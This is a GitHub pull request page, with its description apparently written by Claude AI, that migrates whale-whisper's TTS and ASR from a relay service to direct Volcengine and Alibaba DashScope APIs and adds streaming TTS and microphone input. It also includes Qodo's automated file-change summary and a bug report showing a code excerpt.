feat: migrate TTS providers to backend direct routing by Kiritogu · Pull Request #36 · datawhalechina/whale-whisper

Kiritogu · 2026-03-01T14:37:59Z

概要

将 TTS 和 ASR 模块从第三方中转服务（unspeech）迁移至直接对接火山引擎和阿里云 DashScope 官方 API，同时新增增量流式 TTS、实时 ASR WebSocket、麦克风交互等能力。

问题

TTS 合成依赖第三方中转服务 unspeech.hyp3r.link，增加了延迟和单点故障风险
ASR 仅支持批量转写，缺少实时流式语音识别
前端缺少麦克风输入按钮，无法在对话界面直接语音交互
LLM 流式输出时 TTS 需等待完整回复，响应体验差
语音提供商列表包含多个未实际接入的占位项

关联 Issue / PR：

Related to 当前项目还有哪些没实现的 #28 / 当前项目还有哪些没实现的 #26 — 该 Issue 指出 ASR/TTS 等能力尚未完善，本 PR 直接解决了 TTS 和 ASR 模块的核心实现
Supersedes Fix/tts voice flow #33 — 同分支 fix/tts-voice-flow，本 PR 正确地以 dev 为目标分支

解决方案

后端：为火山引擎和阿里云分别实现原生 API 调用（火山引擎走 HTTPS + Base64 JSON 至 openspeech.bytedance.com，阿里云走 WebSocket 三阶段协议至 dashscope.aliyuncs.com），消除对 unspeech 中转的依赖。新增阿里云 DashScope 实时 ASR（qwen3-asr-flash-realtime）WebSocket 流式识别。Provider Registry 新增本地语音目录（JSON 文件），按模型筛选兼容音色。

前端：实现增量流式 TTS（TtsStreamSegmenter 在 LLM token 到达时按句分段、立即合成），新增多个工具函数模块化拆分逻辑。对话界面和桌面端新增麦克风按钮，支持静音/取消静音状态。精简语音提供商列表，仅保留已实际接入的 4 个提供商。

变更内容

核心变更

后端 TTS 直连路由 (backend/app/api/tts.py, +675/-191)

新增 _forward_volcengine_tts：直接调用火山引擎 TTS API，Bearer token 鉴权，Base64 音频解码
新增 _forward_alibaba_tts：通过 WebSocket 对接阿里云 CosyVoice（run-task → continue-task → finish-task 三阶段协议）
移除 Dify/Coze TTS 处理函数（_stream_dify_tts、_stream_coze_tts）和旧的流式代理逻辑
新增结构化错误提取和火山引擎凭证错误提示

后端 ASR 实时流 (backend/app/api/asr.py, +613/-24)

新增阿里云 DashScope 批量转写（/compatible-mode/v1/chat/completions + input_audio）
新增 AliyunRealtimeSession 实时 WebSocket ASR（wss://dashscope.aliyuncs.com/api-ws/v1/realtime）
新增 WebSocket 断连检测与安全清理
模型自动规范化：实时流强制 -realtime 后缀，批量自动去除

Provider Registry (backend/app/services/providers/registry.py, +225/-4)

list_voices 从本地 JSON 目录加载音色列表（LRU 缓存）
阿里云音色按 compatible_models 过滤，匹配当前选中模型
新增阿里云 NLS ASR 凭证验证和模型列表

前端增量流式 TTS (speech-output.ts + 新工具模块)

TtsStreamSegmenter：按标点和特殊标记分段 LLM 流式 token
runTtsChunkQueue：顺序合成分段，失败时回退合并剩余文本
tts-chunker.ts：支持 CJK 分词（Intl.Segmenter）、保留小数、省略号规范化
tts-direct-request.ts：构建直连 TTS 请求，405 时回退旧格式

前端 ASR 增强 (transcription.ts + 新工具模块)

浏览器语音识别自动重启（shouldAutoRestartBrowserRecognition）
AudioWorklet 失败自动回退 MediaRecorder（decideCaptureFallback）
转写结果清洗：过滤误识别的 Windows 路径（sanitizeTranscript）
语言代码规范化：zh → zh-CN，默认跟随 navigator.language

前端 UI

ChatArea.vue / DesktopChatOverlay.vue：新增麦克风按钮（含静音/取消静音视觉状态）
App.vue：接入 onTokenLiteral / onTokenSpecial 驱动增量 TTS
AudioSection.vue：语言改为下拉选择，移除冗余开关
Tauri 窗口启用 useHttpsScheme 以支持麦克风权限

辅助变更

新增语音目录数据文件：alibaba.json（CosyVoice 音色）、volcengine.json（火山引擎音色）
精简 provider-fallback.ts / provider-options.ts：移除 7 个未接入的语音提供商
provider-visibility.ts：白名单仅保留 4 个已接入提供商
provider-fields.ts：有默认 baseUrl 时自动隐藏该字段
websockets 从 dev 依赖提升为运行时依赖（pyproject.toml）
配置文件 engines.yaml / providers.yaml 更新为官方 API 端点

注意事项

.idea/ 目录（JetBrains IDE 配置）被包含在提交中，建议加入 .gitignore 或从提交中移除
CLAUDE.md 作为项目指引文档一并提交

破坏性变更

移除 Dify/Coze TTS 处理：_stream_dify_tts、_stream_coze_tts 等函数已删除
移除 7 个前端语音提供商选项：OpenAI、ElevenLabs、Microsoft Speech、Index TTS、Comet API、Player2 等不再出现在设置中
默认语音提供商变更：从 openai-audio-speech 改为 browser-local-audio-speech
TTS API 返回类型变更：run_tts_engine 从 StreamingResponse 改为 Response（返回完整音频缓冲区）
阿里云模型 ID 格式变更：alibaba/cosyvoice-v1 → cosyvoice-v1（去除前缀）

测试

新增 13 个测试文件覆盖核心逻辑：

后端测试（4 个）：

test_tts_engine_relay.py：火山引擎 payload 构建、阿里云模型规范化、错误提取
test_asr_aliyun_dashscope.py：DashScope URL 构建、转写文本提取、模型规范化
test_provider_voices_tts.py：音色目录加载和模型过滤
test_provider_catalog_tts_defaults.py：TTS 提供商默认端点验证
test_provider_catalog_aliyun_fields.py：阿里云 NLS 字段规范化
test_asr_stream_disconnect.py：WebSocket 断连检测

前端测试（9 个）：

audio-direct.test.ts：直连请求构建和旧格式回退
tts-chunker.test.ts：文本分段、CJK、特殊标记
tts-stream-segmenter.test.ts：流式分段和 drain
tts-streaming-runner.test.ts：队列执行、错误处理
browser-recognition-restart.test.ts：自动重启逻辑
capture-startup.test.ts：Worklet 回退逻辑
provider-fields.test.ts / provider-visibility.test.ts：字段过滤和可见性
transcript-filter.test.ts / transcription-language.test.ts：转写清洗和语言规范化

自测方式

后端单测通过（pytest backend/tests/test_tts_*.py backend/tests/test_asr_*.py backend/tests/test_provider_*.py）
前端单测通过
本地启动后端 + 前端，验证火山引擎 TTS 合成正常
本地验证阿里云 CosyVoice TTS 合成正常
本地验证阿里云 DashScope 实时 ASR 流式识别正常
对话界面麦克风按钮功能正常（Web + Tauri）
LLM 流式回复时增量 TTS 播放正常
pnpm -C frontend --filter @whalewhisper/web build 构建通过

Checklist

代码符合项目规范
已完成自审
本地测试通过
文档已更新（如需要）
.idea/ 目录已从提交中移除或加入 .gitignore

由 Claude AI 自动生成

This reverts commit 3014403.

greptile-apps

Your free trial has ended. If you'd like to continue receiving code reviews, you can add a payment method here.

qodo-code-review · 2026-03-01T14:38:43Z

Review Summary by Qodo

Migrate TTS/ASR providers to backend direct routing with incremental streaming and voice catalogs

✨ Enhancement 🧪 Tests

Walkthroughs

Description

• Migrate TTS providers to backend direct routing with official provider endpoints for Volcengine
  and Alibaba, replacing unspeech relay
• Implement incremental TTS streaming for assistant responses with TtsStreamSegmenter and
  chunk-based playback
• Add microphone input to chat interface and desktop overlay with source-aware listening context
  tracking
• Implement Alibaba Bailian DashScope ASR integration with realtime WebSocket streaming support
• Add local static voice catalogs for Volcengine and Alibaba providers with backend voice listing
  API
• Normalize Alibaba model IDs by removing alibaba/ prefix in frontend and backend processing
• Prune frontend speech providers to Volcengine, Alibaba, and local audio only with visibility
  filtering
• Add comprehensive test coverage for TTS engine relay, ASR integration, provider voice catalogs,
  and field normalization
• Implement transcript sanitization, language normalization, and browser recognition auto-restart
  logic
• Add provider field filtering to hide redundant baseUrl configuration when defaults exist
• Update default speech provider from OpenAI to browser-local-audio-speech
• Add IDE configuration files and comprehensive development guide (CLAUDE.md)

Diagram

flowchart LR
  FE["Frontend<br/>Chat/Settings UI"]
  BE["Backend<br/>API Router"]
  VC["Volcengine<br/>Official API"]
  AC["Alibaba<br/>DashScope API"]
  
  FE -->|"/api/tts/engines"| BE
  FE -->|"/api/providers/voices"| BE
  FE -->|"/api/asr/stream"| BE
  
  BE -->|"Direct TTS"| VC
  BE -->|"Direct TTS/ASR"| AC
  
  FE -->|"Incremental text"| STREAM["TTS Stream<br/>Segmenter"]
  STREAM -->|"Chunks"| QUEUE["Chunk Queue<br/>Runner"]
  QUEUE -->|"Sequential requests"| BE

File Changes

1. frontend/packages/stage-settings-ui/src/components/AudioSection.vue ✨ Enhancement +96/-102

Refactor audio settings UI for source-aware listening

• Refactored microphone input handling to support multiple listening sources (settings-test and
 chat-input) with source tracking
• Replaced manual voice selection UI with language dropdown selector for transcription
• Removed voiceId and refreshVoices from speech output state management
• Updated listening state to use listeningSource for context-aware UI rendering
• Simplified transcription test UI with improved feedback display

frontend/packages/stage-settings-ui/src/components/AudioSection.vue

2. frontend/apps/web/src/components/widgets/ChatArea.vue ✨ Enhancement +109/-34

Add microphone input button to chat interface

• Added microphone button to chat input area with visual feedback for active listening
• Integrated useTranscriptionStore to manage chat-specific transcription state
• Implemented toggleChatMic function to start/stop listening with chat-input source
• Added error display for transcription errors in chat context

frontend/apps/web/src/components/widgets/ChatArea.vue

3. frontend/apps/desktop-tauri/renderer/src/components/DesktopChatOverlay.vue ✨ Enhancement +85/-18

Add microphone input to desktop chat overlay

• Added microphone button to desktop chat overlay with active state styling
• Integrated transcription store for managing listening state and errors
• Implemented toggleChatMic function for chat-input source listening
• Added visual feedback and error display for transcription in chat

frontend/apps/desktop-tauri/renderer/src/components/DesktopChatOverlay.vue

View more (60)

4. frontend/apps/desktop-tauri/renderer/src/SettingsApp.vue ✨ Enhancement +17/-0

Add microphone cleanup for settings window lifecycle
• Added cleanup for settings-test microphone sessions on window close
• Implemented visibility change listener to stop test microphone when window hidden
• Added stopSettingsTestMic function to manage listening source cleanup
frontend/apps/desktop-tauri/renderer/src/SettingsApp.vue

5. frontend/apps/web/src/components/settings/SettingsDialog.vue ✨ Enhancement +5/-0

Add microphone cleanup for settings dialog
• Added cleanup to stop settings-test listening when settings dialog closes
• Integrated useTranscriptionStore for managing test microphone state
frontend/apps/web/src/components/settings/SettingsDialog.vue

6. frontend/apps/desktop-tauri/renderer/src/ChatApp.vue ✨ Enhancement +8/-0

Integrate speech output for assistant messages
• Added useSpeechOutputStore integration for automatic speech synthesis
• Implemented listener for assistant final messages to trigger speech output
• Added chatStore.connect() call on mount
frontend/apps/desktop-tauri/renderer/src/ChatApp.vue

7. frontend/apps/web/src/App.vue ✨ Enhancement +7/-1

Add incremental speech synthesis for assistant responses

• Added token literal listener to push assistant text to speech output incrementally
• Updated special token handling to include speech output processing
• Changed final message handling to use endAssistantStream for streaming TTS

frontend/apps/web/src/App.vue

8. frontend/packages/app-settings/src/sections/ModelSection.vue ✨ Enhancement +9/-3

Reset voice selection on model change
• Added logic to reset voice field when speech model changes
• Implemented provider refresh after model selection change
frontend/packages/app-settings/src/sections/ModelSection.vue

9. frontend/packages/app-settings/src/sections/AudioSection.vue ✨ Enhancement +6/-1

Add microphone cleanup on unmount
• Added cleanup to stop settings-test listening on component unmount
frontend/packages/app-settings/src/sections/AudioSection.vue

10. frontend/packages/stage-settings-ui/src/components/ProviderPanel.vue ✨ Enhancement +7/-0

Add voice field empty state placeholder
• Added placeholder text for voice field when no compatible voices available
frontend/packages/stage-settings-ui/src/components/ProviderPanel.vue

11. frontend/packages/app-core/src/stores/speech-output.ts ✨ Enhancement +404/-87

Implement incremental TTS streaming for assistant

• Removed voiceId local storage and replaced with provider config voice
• Implemented incremental streaming support with TtsStreamSegmenter for assistant responses
• Added pushAssistantLiteral, pushAssistantSpecial, and endAssistantStream methods for
 streaming TTS
• Refactored TTS request handling to use requestTtsDirect with retry logic
• Added chunk-based playback with fallback to merged remainder on failure

frontend/packages/app-core/src/stores/speech-output.ts

12. frontend/packages/app-core/src/stores/transcription.ts ✨ Enhancement +210/-60

Add listening source tracking and language normalization

• Added listeningSource tracking to distinguish between settings-test and chat-input contexts
• Implemented browser recognition auto-restart logic with error recovery
• Added language normalization and initial language resolution based on navigator
• Refactored listening start/stop to accept options for source and auto-send configuration
• Added transcript sanitization to filter invalid paths and normalize text

frontend/packages/app-core/src/stores/transcription.ts

13. frontend/packages/app-core/src/data/provider-fallback.ts ⚙️ Configuration changes +12/-232

Prune unsupported speech providers and update endpoints

• Removed OpenAI and OpenAI-compatible speech providers from fallback catalog
• Removed ElevenLabs, Microsoft, Index TTS, Comet API, and Player2 speech providers
• Updated Volcengine default base URL from unspeech relay to official endpoint
• Updated Alibaba Cloud default base URL and model IDs (removed alibaba/ prefix)
• Updated Aliyun NLS transcription provider metadata and description

frontend/packages/app-core/src/data/provider-fallback.ts

14. frontend/packages/app-core/src/utils/tts-direct-request.ts ✨ Enhancement +262/-0

Add TTS direct request builder utility

• New utility for building backend relay TTS requests with engine-specific config normalization
• Implements legacy fallback request building for compatibility
• Handles Alibaba model ID normalization and Volcengine appId resolution
• Supports legacy unspeech endpoint migration to official provider endpoints

frontend/packages/app-core/src/utils/tts-direct-request.ts

15. frontend/packages/app-core/src/utils/tts-chunker.ts ✨ Enhancement +243/-0

Add TTS text chunking utility

• New utility for intelligent text chunking optimized for TTS streaming
• Implements punctuation-aware segmentation with word count balancing
• Supports special markers for flush and special token handling
• Provides sanitization to remove special markers from output chunks

frontend/packages/app-core/src/utils/tts-chunker.ts

16. frontend/packages/app-core/src/data/provider-options.ts ⚙️ Configuration changes +7/-104

Update provider options for backend relay

• Removed OpenAI and OpenAI-compatible speech provider options
• Removed ElevenLabs, Microsoft, Index TTS, Comet API, and Player2 speech providers
• Updated Volcengine and Alibaba Cloud provider configurations with new endpoints
• Updated Aliyun NLS transcription provider metadata

frontend/packages/app-core/src/data/provider-options.ts

17. frontend/packages/app-core/src/services/audio-direct.test.ts 🧪 Tests +172/-0

Add tests for TTS direct request builder
• New test suite for TTS direct request building and legacy fallback
• Tests engine support detection, request building, URL normalization
• Validates Alibaba model ID normalization and legacy request conversion
frontend/packages/app-core/src/services/audio-direct.test.ts

18. frontend/packages/app-core/src/services/audio.ts ✨ Enhancement +100/-13

Implement backend relay TTS with legacy fallback

• Refactored requestTts to use requestTtsDirect with backend relay support
• Added fallback to legacy /api/tts/synthesize endpoint on 405 response
• Implemented JSON response parsing for base64-encoded audio payloads
• Added error handling with status code and detail information

frontend/packages/app-core/src/services/audio.ts

19. frontend/packages/app-core/src/utils/transcript-filter.ts ✨ Enhancement +17/-0

Add transcript sanitization utility
• New utility to sanitize transcripts by filtering invalid Windows absolute paths
• Prevents file paths from being treated as transcribed text
frontend/packages/app-core/src/utils/transcript-filter.ts

20. frontend/packages/app-core/src/stores/providers.ts ✨ Enhancement +63/-5

Provider normalization and visibility filtering for speech providers

• Added imports for filterProviderFields and isVisibleSpeechProviderId utilities
• Implemented normalizeProviderEntry() to normalize Aliyun NLS provider fields
• Implemented filterRemovedSpeechProviders() to filter speech providers by visibility
• Updated effectiveProviders computed to apply normalization and filtering to provider catalogs
• Modified getProviderFields() to use filterProviderFields() for field filtering
• Added queueProviderRefresh() helper function for provider refresh management
• Added watcher for settings store provider IDs to trigger provider refresh on changes
• Updated provider config watcher to use queueProviderRefresh()

frontend/packages/app-core/src/stores/providers.ts

21. frontend/packages/app-core/src/services/providers.ts ✨ Enhancement +33/-58

Migrate voice fetching to backend API endpoint

• Removed unspeech library imports and dependencies
• Replaced local Alibaba voice handling with backend API call to /api/providers/voices
• Simplified listProviderVoices() to use unified backend endpoint for voice fetching
• Added support for both direct backend calls and proxy-based requests
• Removed complex voice filtering and model candidate logic (moved to backend)

frontend/packages/app-core/src/services/providers.ts

22. frontend/packages/app-core/src/utils/tts-streaming-runner.ts ✨ Enhancement +72/-0

TTS chunk queue processing with error recovery

• New utility for processing TTS text chunks with error handling and recovery
• Implements runTtsChunkQueue() to process chunks sequentially with configurable error behavior
• Supports stopOnError option to halt on first failure or continue processing
• Provides TtsChunkQueueError for detailed error context with chunk index and total count
• Distinguishes between abort errors (which are rethrown) and recoverable errors

frontend/packages/app-core/src/utils/tts-streaming-runner.ts

23. frontend/packages/app-core/src/utils/tts-streaming-runner.test.ts 🧪 Tests +79/-0

Tests for TTS chunk queue processing

• Test suite for runTtsChunkQueue() function
• Validates chunk processing continuation on individual failures
• Validates error throwing when all chunks fail
• Validates abort error propagation without suppression
• Validates stopOnError option behavior with error context

frontend/packages/app-core/src/utils/tts-streaming-runner.test.ts

24. frontend/packages/app-core/src/utils/provider-fields.ts ✨ Enhancement +23/-0

Provider field filtering based on defaults

• New utility to filter provider configuration fields based on defaults
• Hides baseUrl field when provider has default base URL in provider defaults or field default
• Reduces configuration complexity by hiding redundant fields

frontend/packages/app-core/src/utils/provider-fields.ts

25. frontend/packages/app-core/src/utils/provider-fields.test.ts 🧪 Tests +61/-0

Tests for provider field filtering

• Test suite for filterProviderFields() function
• Validates baseUrl field hiding when provider has default base URL
• Validates baseUrl field hiding when field itself has default value
• Validates baseUrl field retention when no defaults exist

frontend/packages/app-core/src/utils/provider-fields.test.ts

26. frontend/packages/app-core/src/utils/tts-chunker.test.ts 🧪 Tests +51/-0

Tests for TTS text chunking logic

• Test suite for TTS text chunking utilities
• Validates sentence splitting on hard punctuation
• Validates decimal number preservation in chunking
• Validates ellipsis normalization from three dots
• Validates special token and flush instruction handling

frontend/packages/app-core/src/utils/tts-chunker.test.ts

27. frontend/packages/app-core/src/utils/capture-startup.ts ✨ Enhancement +35/-0

Audio capture fallback decision logic

• New utility for audio capture fallback decision logic
• Implements decideCaptureFallback() to choose between media recorder and worklet modes
• Normalizes error messages from various error types
• Provides actionable error information when no fallback is available

frontend/packages/app-core/src/utils/capture-startup.ts

28. frontend/packages/app-core/src/utils/capture-startup.test.ts 🧪 Tests +63/-0

Tests for audio capture fallback logic

• Test suite for audio capture fallback decision logic
• Validates fallback to media recorder when worklet fails
• Validates error return when no fallback available
• Validates error message normalization for non-Error types

frontend/packages/app-core/src/utils/capture-startup.test.ts

29. frontend/packages/app-core/src/utils/tts-stream-segmenter.ts ✨ Enhancement +64/-0

TTS stream segmentation for incremental processing

• New class TtsStreamSegmenter for streaming TTS text segmentation
• Manages incremental text input with special markers for flushing and control
• Emits completed chunks while preserving trailing text for next iteration
• Supports finalization mode for emitting remaining buffered text

frontend/packages/app-core/src/utils/tts-stream-segmenter.ts

30. frontend/packages/app-core/src/utils/tts-stream-segmenter.test.ts 🧪 Tests +39/-0

Tests for TTS stream segmentation
• Test suite for TtsStreamSegmenter class
• Validates sentence emission while keeping trailing text
• Validates special marker flushing behavior
• Validates final drain emission of incomplete sentences
frontend/packages/app-core/src/utils/tts-stream-segmenter.test.ts

31. frontend/packages/app-core/src/utils/provider-visibility.ts ✨ Enhancement +14/-0

Speech provider visibility filtering

• New utility defining visible speech provider IDs
• Implements isVisibleSpeechProviderId() to check provider visibility
• Implements filterVisibleSpeechProviders() to filter provider lists
• Restricts visible providers to Volcengine, Alibaba, and local audio providers

frontend/packages/app-core/src/utils/provider-visibility.ts

32. frontend/packages/app-core/src/utils/provider-visibility.test.ts 🧪 Tests +42/-0

Tests for speech provider visibility
• Test suite for speech provider visibility functions
• Validates visibility of configured speech providers
• Validates filtering of unsupported speech provider IDs
frontend/packages/app-core/src/utils/provider-visibility.test.ts

33. frontend/packages/app-core/src/utils/browser-recognition-restart.ts ✨ Enhancement +23/-0

Browser speech recognition restart decision logic
• New utility for browser speech recognition auto-restart logic
• Implements shouldAutoRestartBrowserRecognition() with multiple decision factors
• Prevents restart on manual stop, permission denial, and other fatal errors
frontend/packages/app-core/src/utils/browser-recognition-restart.ts

34. frontend/packages/app-core/src/utils/browser-recognition-restart.test.ts 🧪 Tests +56/-0

Tests for browser recognition restart logic
• Test suite for browser recognition restart logic
• Validates restart on active user session without fatal errors
• Validates no restart after manual stop
• Validates no restart on microphone permission denial
frontend/packages/app-core/src/utils/browser-recognition-restart.test.ts

35. frontend/packages/app-core/src/utils/transcription-language.ts ✨ Enhancement +25/-0

Transcription language normalization utility

• New utility for transcription language normalization
• Implements normalizeTranscriptionLanguage() to standardize language codes
• Implements resolveInitialTranscriptionLanguage() with fallback to English
• Normalizes short codes (zh → zh-CN, en → en-US)

frontend/packages/app-core/src/utils/transcription-language.ts

36. frontend/packages/app-core/src/utils/transcription-language.test.ts 🧪 Tests +40/-0

Tests for transcription language normalization
• Test suite for transcription language normalization
• Validates short language code expansion
• Validates specific locale preservation
• Validates fallback to English when language missing
frontend/packages/app-core/src/utils/transcription-language.test.ts

37. frontend/packages/app-core/src/utils/transcript-filter.test.ts 🧪 Tests +23/-0

Tests for transcript filtering
• Test suite for transcript sanitization
• Validates filtering of Windows absolute file paths
• Validates preservation of natural language transcripts
frontend/packages/app-core/src/utils/transcript-filter.test.ts

38. frontend/packages/app-core/src/stores/settings.ts ⚙️ Configuration changes +1/-1

Update default speech provider to local audio
• Changed default speech provider from openai-audio-speech to browser-local-audio-speech
frontend/packages/app-core/src/stores/settings.ts

39. backend/app/api/tts.py ✨ Enhancement +675/-191

Direct TTS provider routing for Volcengine and Alibaba

• Refactored TTS engine routing to support direct provider endpoints for Volcengine and Alibaba
• Implemented _forward_volcengine_tts() for direct Volcengine API calls with custom payload format
• Implemented _forward_alibaba_tts() for WebSocket-based Alibaba DashScope TTS
• Added comprehensive error extraction and decoration for provider-specific error messages
• Replaced streaming response with direct response for better error handling
• Added helper functions for payload building, model/voice resolution, and parameter parsing
• Removed legacy Dify and Coze TTS streaming implementations

backend/app/api/tts.py

40. backend/app/api/asr.py ✨ Enhancement +613/-24

Alibaba Bailian DashScope ASR integration with realtime support

• Added support for Alibaba Bailian DashScope ASR with realtime WebSocket streaming
• Implemented _forward_aliyun_dashscope_transcription() for non-realtime ASR via chat API
• Implemented realtime ASR session management with AliyunRealtimeSession dataclass
• Added WebSocket connection handling with proper cleanup and error recovery
• Enhanced streaming endpoint to support Alibaba realtime ASR with audio buffering
• Added helper functions for URL building, credential resolution, and event parsing
• Improved WebSocket disconnect handling with fallback error reporting

backend/app/api/asr.py

41. backend/app/services/providers/registry.py ✨ Enhancement +225/-4

Local TTS voice catalogs and Alibaba ASR support

• Added local TTS voice catalog loading for Volcengine and Alibaba providers
• Implemented _load_local_tts_voices() to load voices from JSON files
• Implemented voice parsing for Alibaba and Volcengine formats with model filtering
• Added Alibaba NLS ASR provider validation and model listing
• Implemented model candidate resolution for Alibaba voice filtering
• Added voice description building from language and compatibility metadata

backend/app/services/providers/registry.py

42. backend/tests/test_tts_engine_relay.py 🧪 Tests +188/-0

Tests for TTS engine relay and payload building

• New test suite for TTS engine relay functions
• Tests for TTS input extraction from various formats
• Tests for API key resolution with override precedence
• Tests for Volcengine and Alibaba payload building
• Tests for model normalization and error decoration

backend/tests/test_tts_engine_relay.py

43. backend/tests/test_asr_aliyun_dashscope.py 🧪 Tests +112/-0

Tests for Alibaba DashScope ASR integration

• New test suite for Alibaba DashScope ASR functions
• Tests for URL building and credential resolution
• Tests for realtime WebSocket URL construction
• Tests for ASR text extraction from various response formats
• Tests for model resolution and event parsing

backend/tests/test_asr_aliyun_dashscope.py

44. backend/tests/test_provider_voices_tts.py 🧪 Tests +110/-0

Tests for provider voice catalog listing

• New test suite for provider voice listing
• Tests for local voice catalog loading for Volcengine and Alibaba
• Tests for model-based voice filtering for Alibaba
• Tests for unsupported provider handling

backend/tests/test_provider_voices_tts.py

45. backend/tests/test_provider_catalog_tts_defaults.py 🧪 Tests +43/-0

Tests for TTS provider catalog defaults

• New test suite for TTS provider catalog defaults
• Validates Volcengine uses official endpoint as default base URL
• Validates Alibaba uses DashScope endpoint with correct model defaults
• Validates model field options in provider catalog

backend/tests/test_provider_catalog_tts_defaults.py

46. backend/app/api/providers.py ✨ Enhancement +52/-23

Refactor provider field serialization with Alibaba-specific filtering

• Added ALIYUN_NLS_PROVIDER_ID constant for Alibaba NLS provider identification
• Extracted field serialization logic into _provider_field_to_dict() helper function
• Created _aliyun_nls_default_field_dicts() to return minimal field configuration (API key only)
 for Alibaba provider
• Introduced _resolve_provider_field_dicts() to conditionally filter provider fields, hiding
 OpenAI-style fields for Alibaba NLS

backend/app/api/providers.py

47. backend/tests/test_provider_catalog_aliyun_fields.py 🧪 Tests +76/-0

Add Alibaba provider field normalization tests

• New test file validating Alibaba NLS provider field normalization
• Tests that only apiKey field is exposed when OpenAI-style fields are present
• Verifies minimal field shape enforcement for Alibaba provider configuration

backend/tests/test_provider_catalog_aliyun_fields.py

48. backend/tests/test_asr_stream_disconnect.py 🧪 Tests +45/-0

Add ASR stream disconnect detection tests

• New test file for WebSocket disconnect detection in ASR streaming
• Tests _is_websocket_disconnect_message() for disconnect frame detection
• Tests _is_disconnect_receive_runtime_error() for runtime error message matching
• Validates that unrelated runtime errors are properly ignored

backend/tests/test_asr_stream_disconnect.py

49. backend/app/services/providers/voices/alibaba.json ⚙️ Configuration changes +294/-0

Add Alibaba Bailian TTS voice catalog

• New static voice catalog for Alibaba Bailian TTS provider
• Contains 20 voice profiles with metadata (name, preview URL, model, voice ID, scenarios, language,
 bitrate, format)
• Supports cosyvoice-v1 model with Chinese and bilingual voice options

backend/app/services/providers/voices/alibaba.json

50. backend/config/providers.yaml ⚙️ Configuration changes +11/-18

Migrate TTS/ASR providers to official endpoints with field normalization

• Updated Volcengine TTS provider: changed base_url from https://unspeech.hyp3r.link/v1/ to
 https://openspeech.bytedance.com/api/v1/tts
• Updated Alibaba TTS provider: changed base_url to https://dashscope.aliyuncs.com and
 normalized model ID from alibaba/cosyvoice-v1 to cosyvoice-v1
• Updated Alibaba ASR provider: added engine_id: aliyun-nls-asr, removed baseUrl and model
 fields, kept only apiKey field
• Changed Alibaba ASR voice field type from select with options_source: voices to plain text
 type

backend/config/providers.yaml

51. backend/config/engines.yaml ⚙️ Configuration changes +27/-3

Add Alibaba Bailian ASR engine and update TTS endpoints

• Updated Volcengine TTS engine: changed base_url from https://unspeech.hyp3r.link/v1 to
 https://openspeech.bytedance.com/api/v1/tts
• Updated Alibaba TTS engine: changed base_url to https://dashscope.aliyuncs.com and model from
 alibaba/cosyvoice-v1 to cosyvoice-v1
• Added new aliyun-nls-asr engine with type aliyun_dashscope_asr, pointing to
 https://dashscope.aliyuncs.com
• Configured ASR defaults and parameters for Alibaba provider (VAD, ITN, region settings)

backend/config/engines.yaml

52. frontend/apps/desktop-tauri/src-tauri/tauri.conf.json ⚙️ Configuration changes +2/-0

Enable HTTPS scheme for Tauri desktop windows
• Added "useHttpsScheme": true to main window configuration
• Added "useHttpsScheme": true to settings window configuration
frontend/apps/desktop-tauri/src-tauri/tauri.conf.json

53. backend/pyproject.toml Dependencies +1/-1

Promote websockets to core dependency

• Moved websockets>=12.0 from optional dev dependencies to core dependencies
• Makes WebSocket support a required dependency for all installations

backend/pyproject.toml

54. .idea/whale-whisper.iml ⚙️ Configuration changes +8/-0

Add IDE module configuration

• New PyCharm/IntelliJ IDE module configuration file
• Defines Python module structure with inherited JDK and source folder settings

.idea/whale-whisper.iml

55. .idea/modules.xml ⚙️ Configuration changes +8/-0

Add IDE project module registry
• New IDE project module manager configuration
• Registers whale-whisper.iml module for the project
.idea/modules.xml

56. .idea/vcs.xml ⚙️ Configuration changes +7/-0

Add IDE Git version control mapping

• New IDE version control configuration
• Maps project root and airi submodule to Git version control

.idea/vcs.xml

57. .idea/misc.xml ⚙️ Configuration changes +4/-0

Add IDE project JDK configuration
• New IDE project settings configuration
• Specifies whale-whisper Python SDK as project JDK
.idea/misc.xml

58. .idea/inspectionProfiles/profiles_settings.xml ⚙️ Configuration changes +6/-0

Add IDE inspection profile settings
• New IDE inspection profiles settings
• Disables project-specific inspection profile in favor of default settings
.idea/inspectionProfiles/profiles_settings.xml

59. .idea/easycode.ignore ⚙️ Configuration changes +13/-0

Add EasyCode plugin ignore patterns

• New ignore patterns file for EasyCode IDE plugin
• Excludes common build artifacts, node modules, test files, and minified assets

.idea/easycode.ignore

60. CLAUDE.md 📝 Documentation +296/-0

Add comprehensive Claude Code development guide

• New comprehensive development guide for Claude Code integration
• Documents project overview, architecture, code standards, testing procedures, and common commands
• Includes environment setup instructions, project structure, and contribution guidelines
• Provides troubleshooting tips and resource references

CLAUDE.md

61. .idea/inspectionProfiles/Project_Default.xml Additional files +144/-0

...

.idea/inspectionProfiles/Project_Default.xml

62. backend/app/services/providers/voices/volcengine.json Additional files +3176/-0

...

backend/app/services/providers/voices/volcengine.json

63. frontend/apps/desktop-tauri/renderer/src/App.vue Additional files +0/-7

...

frontend/apps/desktop-tauri/renderer/src/App.vue

qodo-code-review · 2026-03-01T14:38:45Z

Code Review by Qodo

🐞 Bugs (3) 📘 Rule violations (0) 📎 Requirement gaps (0)

1. Dify/Coze TTS broken 🐞 Bug ✓ Correctness

Description

run_tts_engine no longer routes dify_tts/coze_tts to their dedicated implementations and
instead falls through to _build_unspeech_payload, which requires model and voice. Since
dify-tts/coze-tts are still configured without a model, these engines will now error (400) or
send incompatible payloads to their provider endpoints.

Code

backend/app/api/tts.py[R76-115]

@router.post("/engines")
-async def run_tts_engine(request: EngineRunRequest) -> StreamingResponse:
-    engine_id = _resolve_engine_id(request.engine)
-    config = _get_engine_config(engine_id)
-    text = _coerce_text(request.data)
+async def run_tts_engine(request: EngineRunRequest) -> Response:
+    engine_id = _resolve_tts_engine_id(request.engine)
+    runtime_config = _get_tts_engine_config(engine_id)
+
+    text = _extract_tts_input(request.data)
   if not text:
       raise HTTPException(status_code=400, detail="Missing text input")

-    engine_type = (config.engine_type or "openai_compat").lower()
   overrides = request.config if isinstance(request.config, dict) else {}
+    api_key = _resolve_tts_api_key(runtime_config, overrides)
+    if not api_key:
+        raise HTTPException(status_code=400, detail="Missing apiKey for TTS provider")
+
+    if engine_id in VOLCENGINE_ENGINE_IDS:
+        return await _forward_volcengine_tts(
+            runtime_config=runtime_config,
+            text=text,
+            overrides=overrides,
+            api_key=api_key,
+        )

-    if engine_type in {"dify_tts", "dify"}:
-        stream = await _stream_dify_tts(config, text, overrides)
-        return StreamingResponse(stream, media_type="audio/mpeg")
+    if engine_id in ALIBABA_ENGINE_IDS:
+        return await _forward_alibaba_tts(
+            engine_id=engine_id,
+            runtime_config=runtime_config,
+            text=text,
+            overrides=overrides,
